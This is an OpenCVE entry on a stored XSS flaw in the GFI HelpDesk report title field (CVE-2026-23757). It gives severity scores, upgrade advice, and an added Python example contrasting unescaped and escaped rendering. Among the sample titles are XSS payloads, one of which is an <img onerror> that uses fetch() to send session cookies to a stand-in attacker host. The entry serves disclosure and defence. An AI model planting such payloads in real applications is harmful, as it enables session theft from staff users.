Description
GFI HelpDesk before 4.99.10 contains a stored cross-site scripting vulnerability in the Reports module where the title parameter is passed directly to SWIFT_Report::Create() without HTML sanitization. Attackers can inject arbitrary JavaScript into the report title field when creating or editing a report, and the payload executes when staff members view and click the affected report link in the Manage Reports interface.
Published: 2026-04-20
Score: 5.1 Medium
EPSS: n/a
KEV: No
Impact: Stored XSS
Action: Patch
AI Analysis

Impact

A stored cross-site scripting vulnerability exists in the Reports module of GFI Software HelpDesk: the report title is accepted without sanitization and passed directly to SWIFT_Report::Create(). An attacker who can create or edit a report can embed arbitrary HTML and JavaScript in the title; because the payload is stored with the report, it executes in the browser of every staff member who views or clicks the report link in the Manage Reports interface. Running in a staff session, the injected script can be used for phishing, credential theft, or session hijacking within the HelpDesk application.

Affected Systems

The vulnerability affects GFI Software HelpDesk releases prior to version 4.99.10. No other products or versions are listed as impacted.

Risk and Exploitability

The CVSS v4.0 base score of 5.1 (5.4 under v3.1) rates this as Medium severity. The vectors describe the shape of the attack: reachable over the network, requiring an account that can create or edit reports (PR:L), requiring a staff member to open the Manage Reports page and click the poisoned link (UI:R / UI:P), and with the impact landing in the victim's browser rather than the vulnerable component itself (S:C in v3.1, SC:L/SI:L in v4.0). No EPSS score is available, the vulnerability is not in the CISA KEV catalog, and the SSVC assessment records Exploitation: none and Automatable: no, so there is no documented in-the-wild exploitation. The practical risk is a lower-privileged or already compromised account planting a stored payload that runs JavaScript in a higher-privileged staff session, from which it can read data, act as that user, and extend the foothold inside the organization.

Generated by OpenCVE AI on April 20, 2026 at 20:42 UTC.

Remediation

The CVE record links no vendor advisory or documented workaround (its References field is empty). The description itself, however, scopes the flaw to releases before 4.99.10, which makes 4.99.10 the fixing version.

OpenCVE Recommended Actions

  • Upgrade HelpDesk to version 4.99.10 or later to eliminate the vulnerability.
  • If an upgrade cannot be deployed immediately, restrict the ability to create or edit reports to trusted users and review stored report titles for anything that looks like markup (angle brackets, on*= event-handler attributes, javascript: URLs); a legitimate report title has no reason to contain any of these.
  • As an interim measure only, deploy a web application firewall or application-level input filter on the report title. Treat a rule that blocks <script> tags as a speed bump rather than a fix: it is trivially bypassed with event-handler attributes (for example an <img onerror=...> or <svg onload=...> payload), and the durable control is contextual HTML output encoding of the title wherever it is rendered.
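The following is an added example, not code from GFI HelpDesk or from OpenCVE. It models the render path the description attributes to the Reports module (the title concatenated into the Manage Reports link unchanged), places the hardened version beside it, and shows why the interim <script>-blocklist filter from the last bullet misses event-handler payloads. The report titles, the /staff/Reports/Report/Edit/ path and the function names are assumptions made for illustration; the real application is PHP and its templates may differ.

```python
"""Added example (not GFI HelpDesk or OpenCVE code): stored XSS in a report
title, the escaping that neutralizes it, and why a tag blocklist does not.

The link path and all sample titles below are constructed for illustration
and are assumptions, not data taken from the product or the CVE record.
"""
import html
import re

# Constructed sample report titles: two benign, three representative payloads
# that an account with report create/edit rights could submit.
SAMPLE_TITLES = [
    "Weekly ticket volume",
    "SLA breaches by department",
    "<script>alert(document.cookie)</script>",
    '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
    "<svg/onload=alert(1)>",
]


def render_report_link_vulnerable(report_id: int, title: str) -> str:
    """Mirrors the flaw the CVE describes: the title lands in HTML unescaped."""
    return f'<a href="/staff/Reports/Report/Edit/{report_id}">{title}</a>'


def render_report_link(report_id: int, title: str) -> str:
    """Hardened: encode for the HTML text context at render time.

    html.escape(quote=True) rewrites < > & " and ' so nothing in the title can
    close the text node or start a tag or attribute, whatever was stored.
    """
    return (
        f'<a href="/staff/Reports/Report/Edit/{int(report_id)}">'
        f"{html.escape(title, quote=True)}</a>"
    )


_SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def naive_script_filter(title: str) -> str:
    """A blocklist-style interim filter that strips only <script> tags.

    Included to show the caveat from the recommended actions: event-handler
    attributes and SVG payloads pass through untouched.
    """
    return _SCRIPT_TAG.sub("", title)


# A legitimate report title has no business containing any of these.
_MARKUP_HINT = re.compile(r"<|javascript\s*:|on\w+\s*=", re.IGNORECASE)


def find_suspicious_titles(titles: list[str]) -> list[str]:
    """Retrospective scan of stored titles for markup-like content.

    Runs over a dump of existing report titles, either as the interim
    monitoring step or after patching to find payloads planted earlier.
    """
    return [t for t in titles if _MARKUP_HINT.search(t)]


if __name__ == "__main__":
    for title in SAMPLE_TITLES:
        print("VULN:", render_report_link_vulnerable(7, title))
        print("SAFE:", render_report_link(7, title))
    print("naive filter keeps:", naive_script_filter(SAMPLE_TITLES[3]))
    print("flagged:", find_suspicious_titles(SAMPLE_TITLES))
```

Run it and compare the VULN and SAFE lines for the last three titles: the vulnerable render emits a live <img onerror> tag, the hardened render emits the same text as &lt;img ... onerror=&quot;...&quot;&gt;, and the naive filter returns the onerror payload unchanged while correctly stripping only the <script> one.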

Generated by OpenCVE AI on April 20, 2026 at 20:42 UTC.

Advisories

No advisories yet.

History

Mon, 20 Apr 2026 18:15:00 +0000

Type      Values Removed   Values Added
Metrics   -                ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 20 Apr 2026 18:00:00 +0000

Type         Values Removed   Values Added
Description  -                GFI HelpDesk before 4.99.10 contains a stored cross-site scripting vulnerability in the Reports module where the title parameter is passed directly to SWIFT_Report::Create() without HTML sanitization. Attackers can inject arbitrary JavaScript into the report title field when creating or editing a report, and the payload executes when staff members view and click the affected report link in the Manage Reports interface.
Title        -                GFI HelpDesk < 4.99.10 Stored XSS via Reports Module
Weaknesses   -                CWE-79
References   -                -
Metrics      -                cvssV3_1: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}
                              cvssV4_0: {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-04-20T18:07:01.630Z

Reserved: 2026-01-15T18:42:20.938Z

Link: CVE-2026-23757

Vulnrichment

Updated: 2026-04-20T18:06:57.576Z

NVD

Status : Awaiting Analysis

Published: 2026-04-20T18:16:24.473

Modified: 2026-04-20T19:05:30.750

Link: CVE-2026-23757

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-20T20:45:16Z

Weaknesses